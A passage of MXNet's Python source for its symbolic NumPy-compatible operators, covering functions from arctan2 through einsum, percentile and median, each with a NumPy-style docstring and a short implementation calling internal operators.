    is the second.)  By IEEE convention, this function is defined for
    `x2` = +/-0 and for either or both of `x1` and `x2` = +/-inf (see
    Notes for specific values).

    This function is not defined for complex-valued arguments; for the
    so-called argument of complex values, use `angle`.

    Parameters
    ----------
    x1 : _Symbol or scalar
        `y`-coordinates.
    x2 : _Symbol or scalar
        `x`-coordinates. `x2` must be broadcastable to match the shape of
        `x1` or vice versa.
    out : _Symbol or None, optional
        A location into which the result is stored. If provided, it must have
        a shape that the inputs broadcast to. If not provided or `None`,
        a freshly-allocated array is returned.

    Returns
    -------
    out : _Symbol or scalar
        Array of angles in radians, in the range ``[-pi, pi]``. This is a scalar if
        `x1` and `x2` are scalars.

    Notes
    -----
    *arctan2* is identical to the `atan2` function of the underlying
    C library. The following special values are defined in the C
    standard: [1]_

    ====== ====== ================
    `x1`   `x2`   `arctan2(x1,x2)`
    ====== ====== ================
    +/- 0  +0     +/- 0
    +/- 0  -0     +/- pi
     > 0   +/-inf +0 / +pi
     < 0   +/-inf -0 / -pi
    +/-inf +inf   +/- (pi/4)
    +/-inf -inf   +/- (3*pi/4)
    ====== ====== ================

    Note that +0 and -0 are distinct floating point numbers, as are +inf
    and -inf.

    This function differs from the original numpy.arctan2 in the following aspects:

    - Only support float16, float32 and float64.

    References
    ----------
    .. [1] ISO/IEC standard 9899:1999, "Programming language C."
    """
    return _ufunc_helper(x1, x2, _npi.arctan2, _np.arctan2, _npi.arctan2_scalar, _npi.rarctan2_scalar, out=out)


@set_module('mxnet.symbol.numpy')
@wrap_np_binary_func
def hypot(x1, x2, out=None, **kwargs):
    r"""
    Given the "legs" of a right triangle, return its hypotenuse.

    Equivalent to ``sqrt(x1**2 + x2**2)``, element-wise.  If `x1` or
    `x2` is scalar_like (i.e., unambiguously cast-able to a scalar type),
    it is broadcast for use with each element of the other argument.

    Parameters
    ----------
    x1, x2 : _Symbol or scalar
        Leg of the triangle(s).
    out : _Symbol or None, optional
        A location into which the result is stored. If provided, it must have
        a shape that the inputs broadcast to. If not provided or `None`,
        a freshly-allocated array is returned.

    Returns
    -------
    z : _Symbol or scalar
        The hypotenuse of the triangle(s).
        This is a scalar if both `x1` and `x2` are scalars.

    Notes
    -----
    This function differs from the original numpy.hypot in the following aspects:

    - Only support float16, float32 and float64.
    """
    return _ufunc_helper(x1, x2, _npi.hypot, _np.hypot, _npi.hypot_scalar, None, out)


@set_module('mxnet.symbol.numpy')
@wrap_np_binary_func
def bitwise_and(x1, x2, out=None, **kwargs):
    r"""
    Compute the bit-wise AND of two arrays element-wise.

    Parameters
    ----------
    x1, x2 : _Symbol or scalar
        Only integer and boolean types are handled. If x1.shape != x2.shape,
        they must be broadcastable to a common shape (which becomes the shape of the output).
    out : _Symbol or None, optional
        A location into which the result is stored. If provided, it must have
        a shape that the inputs broadcast to. If not provided or `None`,
        a freshly-allocated array is returned.

    Returns
    -------
    out : _Symbol or scalar
        Result.
    """
    return _ufunc_helper(x1, x2, _npi.bitwise_and, _np.bitwise_and, _npi.bitwise_and_scalar, None, out)


@set_module('mxnet.symbol.numpy')
@wrap_np_binary_func
def bitwise_xor(x1, x2, out=None, **kwargs):
    r"""
    Compute the bit-wise XOR of two arrays element-wise.

    Parameters
    ----------
    x1, x2 : _Symbol or scalar
        Only integer and boolean types are handled. If x1.shape != x2.shape,
        they must be broadcastable to a common shape (which becomes the shape of the output).
    out : _Symbol or None, optional
        A location into which the result is stored. If provided, it must have
        a shape that the inputs broadcast to. If not provided or `None`,
        a freshly-allocated array is returned.

    Returns
    -------
    out : _Symbol or scalar
        Result.
    """
    return _ufunc_helper(x1, x2, _npi.bitwise_xor, _np.bitwise_xor, _npi.bitwise_xor_scalar, None, out)


@set_module('mxnet.symbol.numpy')
@wrap_np_binary_func
def bitwise_or(x1, x2, out=None, **kwargs):
    r"""
    Compute the bit-wise OR of two arrays element-wise.

    Parameters
    ----------
    x1, x2 : _Symbol or scalar
        Only integer and boolean types are handled. If x1.shape != x2.shape,
        they must be broadcastable to a common shape (which becomes the shape of the output).
    out : _Symbol or None, optional
        A location into which the result is stored. If provided, it must have
        a shape that the inputs broadcast to. If not provided or `None`,
        a freshly-allocated array is returned.

    Returns
    -------
    out : _Symbol or scalar
        Result.
    """
    return _ufunc_helper(x1, x2, _npi.bitwise_or, _np.bitwise_or, _npi.bitwise_or_scalar, None, out)


@set_module('mxnet.symbol.numpy')
def unique(ar, return_index=False, return_inverse=False, return_counts=False, axis=None):
    """
    Find the unique elements of an array.

    Returns the sorted unique elements of an array. There are three optional
    outputs in addition to the unique elements:

    * the indices of the input array that give the unique values
    * the indices of the unique array that reconstruct the input array
    * the number of times each unique value comes up in the input array

    Parameters
    ----------
    ar : _Symbol
        Input array. Unless `axis` is specified, this will be flattened if it
        is not already 1-D.
    return_index : bool, optional
        If True, also return the indices of `ar` (along the specified axis,
        if provided, or in the flattened array) that result in the unique array.
    return_inverse : bool, optional
        If True, also return the indices of the unique array (for the specified
        axis, if provided) that can be used to reconstruct `ar`.
    return_counts : bool, optional
        If True, also return the number of times each unique item appears
        in `ar`.
    axis : int or None, optional
        The axis to operate on. If None, `ar` will be flattened. If an integer,
        the subarrays indexed by the given axis will be flattened and treated
        as the elements of a 1-D array with the dimension of the given axis,
        see the notes for more details. The default is None.

    Returns
    -------
    unique : _Symbol
        The sorted unique values.
    unique_indices : _Symbol, optional
        The indices of the first occurrences of the unique values in the
        original array. Only provided if `return_index` is True.
    unique_inverse : _Symbol, optional
        The indices to reconstruct the original array from the
        unique array. Only provided if `return_inverse` is True.
    unique_counts : _Symbol, optional
        The number of times each of the unique values comes up in the
        original array. Only provided if `return_counts` is True.

    Notes
    -----
    When an axis is specified the subarrays indexed by the axis are sorted.
    This is done by making the specified axis the first dimension of the array
    and then flattening the subarrays in C order. The flattened subarrays are
    then viewed as a structured type with each element given a label, with the
    effect that we end up with a 1-D array of structured types that can be
    treated in the same way as any other 1-D array. The result is that the
    flattened subarrays are sorted in lexicographic order starting with the
    first element.
    """
    return _npi.unique(ar, return_index, return_inverse, return_counts, axis)


@set_module('mxnet.symbol.numpy')
@wrap_np_binary_func
def ldexp(x1, x2, out=None, **kwargs):
    """
    Returns x1 * 2**x2, element-wise.

    The mantissas `x1` and twos exponents `x2` are used to construct
    floating point numbers ``x1 * 2**x2``.

    Parameters
    ----------
    x1 : _Symbol
        Array of multipliers.
    x2 : _Symbol
        Array of twos exponents.
    out : _Symbol or None
        Dummy parameter to keep the consistency with the ndarray counterpart.

    Returns
    -------
    y : _Symbol
        The result of ``x1 * 2**x2``.

    Notes
    -----
    Complex dtypes are not supported, they will raise a TypeError.
    Different from numpy, we allow x2 to be float besides int.
    `ldexp` is useful as the inverse of `frexp`, if used by itself it is
    more clear to simply use the expression ``x1 * 2**x2``.
    """
    return _ufunc_helper(x1, x2, _npi.ldexp, _np.ldexp, _npi.ldexp_scalar, _npi.rldexp_scalar, out)


@set_module('mxnet.symbol.numpy')
def vdot(a, b):
    r"""
    Return the dot product of two vectors.

    Note that `vdot` handles multidimensional arrays differently than `dot`:
    it does *not* perform a matrix product, but flattens input arguments
    to 1-D vectors first. Consequently, it should only be used for vectors.

    Parameters
    ----------
    a : _Symbol
        First argument to the dot product.
    b : _Symbol
        Second argument to the dot product.

    Returns
    -------
    output : _Symbol
        Dot product of `a` and `b`.

    See Also
    --------
    dot : Return the dot product without using the complex conjugate of the
          first argument.

    Examples
    --------
    Note that higher-dimensional arrays are flattened!

    >>> a = np.array([[1, 4], [5, 6]])
    >>> b = np.array([[4, 1], [2, 2]])
    >>> np.vdot(a, b)
    30
    >>> np.vdot(b, a)
    30
    >>> 1*4 + 4*1 + 5*2 + 6*2
    30
    """
    # vdot on real inputs reduces to a plain inner product of the
    # flattened operands (1-axis tensordot).
    return tensordot(a.flatten(), b.flatten(), 1)


@set_module('mxnet.symbol.numpy')
def inner(a, b):
    r"""Inner product of two arrays.

    Ordinary inner product of vectors for 1-D arrays (without complex
    conjugation), in higher dimensions a sum product over the last axes.

    Parameters
    ----------
    a, b : _Symbol
        If `a` and `b` are nonscalar, their last dimensions must match.
Returns ------- out : _Symbol `out.shape = a.shape[:-1] + b.shape[:-1]` Raises ------ ValueError If the last dimension of `a` and `b` has different size. See Also -------- tensordot : Sum products over arbitrary axes. dot : Generalised matrix product, using second last dimension of `b`. einsum : Einstein summation convention. Notes ----- For vectors (1-D arrays) it computes the ordinary inner-product:: np.inner(a, b) = sum(a[:]*b[:]) More generally, if `ndim(a) = r > 0` and `ndim(b) = s > 0`:: np.inner(a, b) = np.tensordot(a, b, axes=(-1,-1)) or explicitly:: np.inner(a, b)[i0,...,ir-1,j0,...,js-1] = sum(a[i0,...,ir-1,:]*b[j0,...,js-1,:]) In addition `a` or `b` may be scalars, in which case:: np.inner(a,b) = a*b Examples -------- Ordinary inner product for vectors: >>> a = np.array([1,2,3]) >>> b = np.array([0,1,0]) >>> np.inner(a, b) 2 A multidimensional example: >>> a = np.arange(24).reshape((2,3,4)) >>> b = np.arange(4) >>> np.inner(a, b) array([[ 14, 38, 62], [ 86, 110, 134]]) """ return tensordot(a, b, [-1, -1]) @set_module('mxnet.symbol.numpy') def outer(a, b): r"""Compute the outer product of two vectors. Given two vectors, ``a = [a0, a1, ..., aM]`` and ``b = [b0, b1, ..., bN]``, the outer product [1]_ is:: [[a0*b0 a0*b1 ... a0*bN ] [a1*b0 . [ ... . [aM*b0 aM*bN ]] Parameters ---------- a : (M,) _Symbol First input vector. Input is flattened if not already 1-dimensional. b : (N,) _Symbol Second input vector. Input is flattened if not already 1-dimensional. Returns ------- out : (M, N) _Symbol ``out[i, j] = a[i] * b[j]`` See also -------- inner einsum : ``einsum('i,j->ij', a.ravel(), b.ravel())`` is the equivalent. ufunc.outer : A generalization to N dimensions and other operations. ``np.multiply.outer(a.ravel(), b.ravel())`` is the equivalent. References ---------- .. [1] : G. H. Golub and C. F. Van Loan, *Matrix Computations*, 3rd ed., Baltimore, MD, Johns Hopkins University Press, 1996, pg. 8. 
Examples -------- Make a (*very* coarse) grid for computing a Mandelbrot set: >>> rl = np.outer(np.ones((5,)), np.linspace(-2, 2, 5)) >>> rl array([[-2., -1., 0., 1., 2.], [-2., -1., 0., 1., 2.], [-2., -1., 0., 1., 2.], [-2., -1., 0., 1., 2.], [-2., -1., 0., 1., 2.]]) """ return tensordot(a.flatten(), b.flatten(), 0) @set_module('mxnet.symbol.numpy') def cross(a, b, axisa=-1, axisb=-1, axisc=-1, axis=None): # pylint: disable=too-many-arguments """ Return the cross product of two (arrays of) vectors. The cross product of `a` and `b` in :math:`R^3` is a vector perpendicular to both `a` and `b`. If `a` and `b` are arrays of vectors, the vectors are defined by the last axis of `a` and `b` by default, and these axes can have dimensions 2 or 3. Where the dimension of either `a` or `b` is 2, the third component of the input vector is assumed to be zero and the cross product calculated accordingly. In cases where both input vectors have dimension 2, the z-component of the cross product is returned. Parameters ---------- a : _Symbol Components of the first vector(s). b : _Symbol Components of the second vector(s). axisa : int, optional Axis of `a` that defines the vector(s). By default, the last axis. axisb : int, optional Axis of `b` that defines the vector(s). By default, the last axis. axisc : int, optional Axis of `c` containing the cross product vector(s). Ignored if both input vectors have dimension 2, as the return is scalar. By default, the last axis. axis : int, optional If defined, the axis of `a`, `b` and `c` that defines the vector(s) and cross product(s). Overrides `axisa`, `axisb` and `axisc`. Returns ------- c : _Symbol Vector cross product(s). Raises ------ ValueError When the dimension of the vector(s) in `a` and/or `b` does not equal 2 or 3. Notes ----- Supports full broadcasting of the inputs. 
""" if axis is not None: axisa, axisb, axisc = (axis,) * 3 return _npi.cross(a, b, axisa, axisb, axisc) @set_module('mxnet.symbol.numpy') def kron(a, b): r""" kron(a, b) Kronecker product of two arrays. Computes the Kronecker product, a composite array made of blocks of the second array scaled by the first. Parameters ---------- a, b : ndarray Returns ------- out : ndarray See Also -------- outer : The outer product Notes ----- The function assumes that the number of dimensions of `a` and `b` are the same, if necessary prepending the smallest with ones. If `a.shape = (r0,r1,..,rN)` and `b.shape = (s0,s1,...,sN)`, the Kronecker product has shape `(r0*s0, r1*s1, ..., rN*SN)`. The elements are products of elements from `a` and `b`, organized explicitly by:: kron(a,b)[k0,k1,...,kN] = a[i0,i1,...,iN] * b[j0,j1,...,jN] where:: kt = it * st + jt, t = 0,...,N In the common 2-D case (N=1), the block structure can be visualized:: [[ a[0,0]*b, a[0,1]*b, ... , a[0,-1]*b ], [ ... ... ], [ a[-1,0]*b, a[-1,1]*b, ... , a[-1,-1]*b ]] Examples -------- >>> np.kron([1,10,100], [5,6,7]) array([ 5, 6, 7, 50, 60, 70, 500, 600, 700]) >>> np.kron([5,6,7], [1,10,100]) array([ 5, 50, 500, 6, 60, 600, 7, 70, 700]) """ return _npi.kron(a, b) @set_module('mxnet.symbol.numpy') def equal(x1, x2, out=None): """ Return (x1 == x2) element-wise. Parameters ---------- x1, x2 : _Symbol or scalars Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to a common shape (which becomes the shape of the output). out : Dummy parameter, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. Returns ------- out : _Symbol or scalar Output array of type bool, element-wise comparison of `x1` and `x2`. This is a scalar if both `x1` and `x2` are scalars. 
    See Also
    --------
    not_equal, greater_equal, less_equal, greater, less

    Examples
    --------
    >>> np.equal(np.ones((2, 1)), np.zeros((1, 3)))
    array([[False, False, False],
           [False, False, False]])
    >>> np.equal(1, np.ones(1))
    array([ True])
    """
    return _ufunc_helper(x1, x2, _npi.equal, _np.equal, _npi.equal_scalar, None, out)


@set_module('mxnet.symbol.numpy')
def not_equal(x1, x2, out=None):
    """
    Return (x1 != x2) element-wise.

    Parameters
    ----------
    x1, x2 : _Symbol or scalars
        Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to
        a common shape (which becomes the shape of the output).
    out : Dummy parameter, optional
        A location into which the result is stored. If provided, it must have
        a shape that the inputs broadcast to. If not provided or `None`,
        a freshly-allocated array is returned.

    Returns
    -------
    out : _Symbol or scalar
        Output array of type bool, element-wise comparison of `x1` and `x2`.
        This is a scalar if both `x1` and `x2` are scalars.

    See Also
    --------
    equal, greater, greater_equal, less, less_equal

    Examples
    --------
    >>> np.not_equal(np.ones((2, 1)), np.zeros((1, 3)))
    array([[ True,  True,  True],
           [ True,  True,  True]])
    >>> np.not_equal(1, np.ones(1))
    array([False])
    """
    return _ufunc_helper(x1, x2, _npi.not_equal, _np.not_equal, _npi.not_equal_scalar, None, out)


@set_module('mxnet.symbol.numpy')
def greater(x1, x2, out=None):
    """
    Return the truth value of (x1 > x2) element-wise.

    Parameters
    ----------
    x1, x2 : _Symbol or scalars
        Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to
        a common shape (which becomes the shape of the output).
    out : Dummy parameter, optional
        A location into which the result is stored. If provided, it must have
        a shape that the inputs broadcast to. If not provided or `None`,
        a freshly-allocated array is returned.

    Returns
    -------
    out : _Symbol or scalar
        Output array of type bool, element-wise comparison of `x1` and `x2`.
        This is a scalar if both `x1` and `x2` are scalars.
    See Also
    --------
    equal, greater, greater_equal, less, less_equal

    Examples
    --------
    >>> np.greater(np.ones((2, 1)), np.zeros((1, 3)))
    array([[ True,  True,  True],
           [ True,  True,  True]])
    >>> np.greater(1, np.ones(1))
    array([False])
    """
    return _ufunc_helper(x1, x2, _npi.greater, _np.greater, _npi.greater_scalar, _npi.less_scalar, out)


@set_module('mxnet.symbol.numpy')
def less(x1, x2, out=None):
    """
    Return the truth value of (x1 < x2) element-wise.

    Parameters
    ----------
    x1, x2 : _Symbol or scalars
        Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to
        a common shape (which becomes the shape of the output).
    out : Dummy parameter, optional
        A location into which the result is stored. If provided, it must have
        a shape that the inputs broadcast to. If not provided or `None`,
        a freshly-allocated array is returned.

    Returns
    -------
    out : _Symbol or scalar
        Output array of type bool, element-wise comparison of `x1` and `x2`.
        This is a scalar if both `x1` and `x2` are scalars.

    See Also
    --------
    equal, greater, greater_equal, less, less_equal

    Examples
    --------
    >>> np.less(np.ones((2, 1)), np.zeros((1, 3)))
    array([[False, False, False],
           [False, False, False]])
    >>> np.less(1, np.ones(1))
    array([False])
    """
    return _ufunc_helper(x1, x2, _npi.less, _np.less, _npi.less_scalar, _npi.greater_scalar, out)


@set_module('mxnet.symbol.numpy')
def greater_equal(x1, x2, out=None):
    """
    Return the truth value of (x1 >= x2) element-wise.

    Parameters
    ----------
    x1, x2 : _Symbol or scalars
        Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to
        a common shape (which becomes the shape of the output).
    out : Dummy parameter, optional
        A location into which the result is stored. If provided, it must have
        a shape that the inputs broadcast to. If not provided or `None`,
        a freshly-allocated array is returned.

    Returns
    -------
    out : _Symbol or scalar
        Output array of type bool, element-wise comparison of `x1` and `x2`.
        This is a scalar if both `x1` and `x2` are scalars.
    See Also
    --------
    equal, greater, greater_equal, less, less_equal

    Examples
    --------
    >>> np.greater_equal(np.ones((2, 1)), np.zeros((1, 3)))
    array([[ True,  True,  True],
           [ True,  True,  True]])
    >>> np.greater_equal(1, np.ones(1))
    array([ True])
    """
    return _ufunc_helper(x1, x2, _npi.greater_equal, _np.greater_equal, _npi.greater_equal_scalar,
                         _npi.less_equal_scalar, out)


@set_module('mxnet.symbol.numpy')
def less_equal(x1, x2, out=None):
    """
    Return the truth value of (x1 <= x2) element-wise.

    Parameters
    ----------
    x1, x2 : _Symbol or scalars
        Input arrays. If ``x1.shape != x2.shape``, they must be broadcastable to
        a common shape (which becomes the shape of the output).
    out : Dummy parameter, optional
        A location into which the result is stored. If provided, it must have
        a shape that the inputs broadcast to. If not provided or `None`,
        a freshly-allocated array is returned.

    Returns
    -------
    out : _Symbol or scalar
        Output array of type bool, element-wise comparison of `x1` and `x2`.
        This is a scalar if both `x1` and `x2` are scalars.

    See Also
    --------
    equal, greater, greater_equal, less, less_equal

    Examples
    --------
    >>> np.less_equal(np.ones((2, 1)), np.zeros((1, 3)))
    array([[False, False, False],
           [False, False, False]])
    >>> np.less_equal(1, np.ones(1))
    array([ True])
    """
    return _ufunc_helper(x1, x2, _npi.less_equal, _np.less_equal, _npi.less_equal_scalar,
                         _npi.greater_equal_scalar, out)


@set_module('mxnet.symbol.numpy')
def roll(a, shift, axis=None):
    """
    Roll array elements along a given axis.

    Elements that roll beyond the last position are re-introduced at
    the first.

    Parameters
    ----------
    a : _Symbol
        Input array.
    shift : int or tuple of ints
        The number of places by which elements are shifted.  If a tuple,
        then `axis` must be a tuple of the same size, and each of the
        given axes is shifted by the corresponding number.  If an int
        while `axis` is a tuple of ints, then the same value is used for
        all given axes.
axis : int or tuple of ints, optional Axis or axes along which elements are shifted. By default, the array is flattened before shifting, after which the original shape is restored. Returns ------- res : _Symbol Output array, with the same shape as `a`. Notes ----- Supports rolling over multiple dimensions simultaneously. """ return _npi.roll(a, shift, axis=axis) @wrap_np_binary_func def logical_and(x1, x2, out=None): r""" Compute the truth value of x1 AND x2 element-wise. Parameters ---------- x1, x2 : array_like Logical AND is applied to the elements of `x1` and `x2`. If ``x1.shape != x2.shape``, they must be broadcastable to a common shape (which becomes the shape of the output). out : ndarray, None, or tuple of ndarray and None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. A tuple (possible only as a keyword argument) must have length equal to the number of outputs. Returns ------- y : ndarray or bool Boolean result of the logical AND operation applied to the elements of `x1` and `x2`; the shape is determined by broadcasting. This is a scalar if both `x1` and `x2` are scalars. See Also -------- logical_or, logical_not, logical_xor, bitwise_or Examples -------- >>> np.logical_and(True, False) False >>> np.logical_and(np.array([True, True], dtype='bool'), np.array([False, True], dtype='bool')) array([False, True]) """ return _ufunc_helper(x1, x2, _npi.logical_and, _np.logical_and, _npi.logical_and_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def logical_or(x1, x2, out=None): r""" Compute the truth value of x1 OR x2 element-wise. Parameters ---------- x1, x2 : array_like Logical OR is applied to the elements of `x1` and `x2`. If ``x1.shape != x2.shape``, they must be broadcastable to a common shape (which becomes the shape of the output). 
out : ndarray, None, or tuple of ndarray and None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. A tuple (possible only as a keyword argument) must have length equal to the number of outputs. Returns ------- y : ndarray or bool Boolean result of the logical OR operation applied to the elements of `x1` and `x2`; the shape is determined by broadcasting. This is a scalar if both `x1` and `x2` are scalars. See Also -------- logical_and, logical_not, logical_xor, bitwise_or Examples -------- >>> np.logical_or(True, False) True >>> np.logical_or(np.array([True, True], dtype='bool'), np.array([False, True], dtype='bool')) array([True, True]) """ return _ufunc_helper(x1, x2, _npi.logical_or, _np.logical_or, _npi.logical_or_scalar, None, out) @set_module('mxnet.symbol.numpy') @wrap_np_binary_func def logical_xor(x1, x2, out=None): r""" Compute the truth value of x1 XOR x2 element-wise. Parameters ---------- x1, x2 : array_like Logical XOR is applied to the elements of `x1` and `x2`. If ``x1.shape != x2.shape``, they must be broadcastable to a common shape (which becomes the shape of the output). out : ndarray, None, or tuple of ndarray and None, optional A location into which the result is stored. If provided, it must have a shape that the inputs broadcast to. If not provided or `None`, a freshly-allocated array is returned. A tuple (possible only as a keyword argument) must have length equal to the number of outputs. Returns ------- y : ndarray or bool Boolean result of the logical XOR operation applied to the elements of `x1` and `x2`; the shape is determined by broadcasting. This is a scalar if both `x1` and `x2` are scalars. 
    See Also
    --------
    logical_and, logical_not, logical_or, bitwise_or

    Examples
    --------
    >>> np.logical_xor(True, False)
    True
    >>> np.logical_xor(np.array([True, True], dtype='bool'), np.array([False, True], dtype='bool'))
    array([ True, False])
    """
    return _ufunc_helper(x1, x2, _npi.logical_xor, _np.logical_xor, _npi.logical_xor_scalar, None, out)


@set_module('mxnet.symbol.numpy')
def rot90(m, k=1, axes=(0, 1)):
    """
    Rotate an array by 90 degrees in the plane specified by axes.
    Rotation direction is from the first towards the second axis.

    Parameters
    ----------
    m : _Symbol
        Array of two or more dimensions.
    k : integer
        Number of times the array is rotated by 90 degrees.
    axes : (2,) array_like
        The array is rotated in the plane defined by the axes.
        Axes must be different.

    Returns
    -------
    y : _Symbol
        A rotated view of `m`.

    Notes
    -----
    rot90(m, k=1, axes=(1,0)) is the reverse of rot90(m, k=1, axes=(0,1))
    rot90(m, k=1, axes=(1,0)) is equivalent to rot90(m, k=-1, axes=(0,1))

    Examples
    --------
    >>> m = np.array([[1,2],[3,4]], 'int')
    >>> m
    array([[1, 2],
           [3, 4]], dtype=int64)
    >>> np.rot90(m)
    array([[2, 4],
           [1, 3]], dtype=int64)
    >>> np.rot90(m, 2)
    array([[4, 3],
           [2, 1]], dtype=int64)
    >>> m = np.arange(8).reshape((2,2,2))
    >>> np.rot90(m, 1, (1,2))
    array([[[1., 3.],
            [0., 2.]],

           [[5., 7.],
            [4., 6.]]])
    """
    return _npi.rot90(m, k=k, axes=axes)


@set_module('mxnet.symbol.numpy')
def einsum(*operands, **kwargs):
    r"""
    einsum(subscripts, *operands, out=None, optimize=False)

    Evaluates the Einstein summation convention on the operands.

    Using the Einstein summation convention, many common multi-dimensional,
    linear algebraic array operations can be represented in a simple fashion.
    In *implicit* mode `einsum` computes these values.

    In *explicit* mode, `einsum` provides further flexibility to compute
    other array operations that might not be considered classical Einstein
    summation operations, by disabling, or forcing summation over specified
    subscript labels.

    See the notes and examples for clarification.
Parameters ---------- subscripts : str Specifies the subscripts for summation as comma separated list of subscript labels. An implicit (classical Einstein summation) calculation is performed unless the explicit indicator '->' is included as well as subscript labels of the precise output form. operands : list of _Symbol These are the arrays for the operation. out : _Symbol, optional If provided, the calculation is done into this array. optimize : {False, True}, optional Controls if intermediate optimization should occur. No optimization will occur if False. Defaults to False. Returns ------- output : _Symbol The calculation based on the Einstein summation convention. Notes ----- The Einstein summation convention can be used to compute many multi-dimensional, linear algebraic array operations. `einsum` provides a succinct way of representing these. A non-exhaustive list of these operations, which can be computed by `einsum`, is shown below along with examples: * Trace of an array, :py:func:`np.trace`. * Return a diagonal, :py:func:`np.diag`. * Array axis summations, :py:func:`np.sum`. * Transpositions and permutations, :py:func:`np.transpose`. * Matrix multiplication and dot product, :py:func:`np.matmul` :py:func:`np.dot`. * Vector inner and outer products, :py:func:`np.inner` :py:func:`np.outer`. * Broadcasting, element-wise and scalar multiplication, :py:func:`np.multiply`. * Tensor contractions, :py:func:`np.tensordot`. The subscripts string is a comma-separated list of subscript labels, where each label refers to a dimension of the corresponding operand. Whenever a label is repeated it is summed, so ``np.einsum('i,i', a, b)`` is equivalent to :py:func:`np.inner(a,b) <np.inner>`. If a label appears only once, it is not summed, so ``np.einsum('i', a)`` produces a view of ``a`` with no changes. A further example ``np.einsum('ij,jk', a, b)`` describes traditional matrix multiplication and is equivalent to :py:func:`np.matmul(a,b) <np.matmul>`. 
Repeated subscript labels in one operand take the diagonal. For example, ``np.einsum('ii', a)`` is equivalent to :py:func:`np.trace(a) <np.trace>`. In *implicit mode*, the chosen subscripts are important since the axes of the output are reordered alphabetically. This means that ``np.einsum('ij', a)`` doesn't affect a 2D array, while ``np.einsum('ji', a)`` takes its transpose. Additionally, ``np.einsum('ij,jk', a, b)`` returns a matrix multiplication, while, ``np.einsum('ij,jh', a, b)`` returns the transpose of the multiplication since subscript 'h' precedes subscript 'i'. In *explicit mode* the output can be directly controlled by specifying output subscript labels. This requires the identifier '->' as well as the list of output subscript labels. This feature increases the flexibility of the function since summing can be disabled or forced when required. The call ``np.einsum('i->', a)`` is like :py:func:`np.sum(a, axis=-1) <np.sum>`, and ``np.einsum('ii->i', a)`` is like :py:func:`np.diag(a) <np.diag>`. The difference is that `einsum` does not allow broadcasting by default. Additionally ``np.einsum('ij,jh->ih', a, b)`` directly specifies the order of the output subscript labels and therefore returns matrix multiplication, unlike the example above in implicit mode. To enable and control broadcasting, use an ellipsis. Default NumPy-style broadcasting is done by adding an ellipsis to the left of each term, like ``np.einsum('...ii->...i', a)``. To take the trace along the first and last axes, you can do ``np.einsum('i...i', a)``, or to do a matrix-matrix product with the left-most indices instead of rightmost, one can do ``np.einsum('ij...,jk...->ik...', a, b)``. When there is only one operand, no axes are summed, and no output parameter is provided, a view into the operand is returned instead of a new array. Thus, taking the diagonal as ``np.einsum('ii->i', a)`` produces a view. 
The ``optimize`` argument which will optimize the contraction order of an einsum expression. For a contraction with three or more operands this can greatly increase the computational efficiency at the cost of a larger memory footprint during computation. Typically a 'greedy' algorithm is applied which empirical tests have shown returns the optimal path in the majority of cases. 'optimal' is not supported for now. This function differs from the original `numpy.einsum <https://docs.scipy.org/doc/numpy/reference/generated/numpy.einsum.html>`_ in the following way(s): - Does not support 'optimal' strategy - Does not support the alternative subscript like `einsum(op0, sublist0, op1, sublist1, ..., [sublistout])` - Does not produce view in any cases """ # Grab non-einsum kwargs; do not optimize by default. optimize_arg = kwargs.pop('optimize', False) out = kwargs.pop('out', None) subscripts = operands[0] operands = operands[1:] return _npi.einsum(*operands, subscripts=subscripts, out=out, optimize=int(optimize_arg)) @set_module('mxnet.symbol.numpy') def percentile(a, q, axis=None, out=None, overwrite_input=None, interpolation='linear', keepdims=False): # pylint: disable=too-many-arguments """ Compute the q-th percentile of the data along the specified axis. Returns the q-th percentile(s) of the array elements. Parameters ---------- a : _Symbol Input array q : _Symbol Percentile or sequence of percentiles to compute. axis : {int, tuple of int, None}, optional Axis or axes along which the percentiles are computed. The default is to compute the percentile(s) along a flattened version of the array. out : ndarray, optional Alternative output array in which to place the result. It must have the same shape and buffer length as the expected output, but the type (of the output) will be cast if necessary. overwrite_input : bool, optional (Not supported yet) If True, then allow the input array a to be modified by intermediate calculations, to save memory. 
In this case, the contents of the input a after this function completes is undefined. interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'} This optional parameter specifies the interpolation method to use when the desired percentile lies between two data points i < j: 'linear': i + (j - i) * fraction, where fraction is the fractional part of the index surrounded by i and j. 'lower': i. 'higher': j. 'nearest': i or j, whichever is nearest. 'midpoint': (i + j) / 2. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. With this option, the result will broadcast correctly against the original array a. Returns ------- percentile : _Symbol Output array. """ if overwrite_input is not None: raise NotImplementedError('overwrite_input is not supported yet') if isinstance(q, numeric_types): return _npi.percentile(a, axis=axis, interpolation=interpolation, keepdims=keepdims, q_scalar=q, out=out) return _npi.percentile(a, q, axis=axis, interpolation=interpolation, keepdims=keepdims, q_scalar=None, out=out) @set_module('mxnet.symbol.numpy') def median(a, axis=None, out=None, overwrite_input=None, keepdims=False): r""" Compute the median along the specified axis. Returns the median of the array elements. Parameters ---------- a : _Symbol Input array or object that can be converted to an array. axis : {int, sequence of int, None}, optional Axis or axes along which the medians are computed. The default is to compute the median along a flattened version of the array. A sequence of axes is supported since version 1.9.0. out : _Symbol, optional Alternative output array in which to place the result. It must have the same shape and buffer length as the expected output, but the type (of the output) will be cast if necessary. keepdims : bool, optional If this is set to True, the axes which are reduced are left in the result as dimensions with size one. 
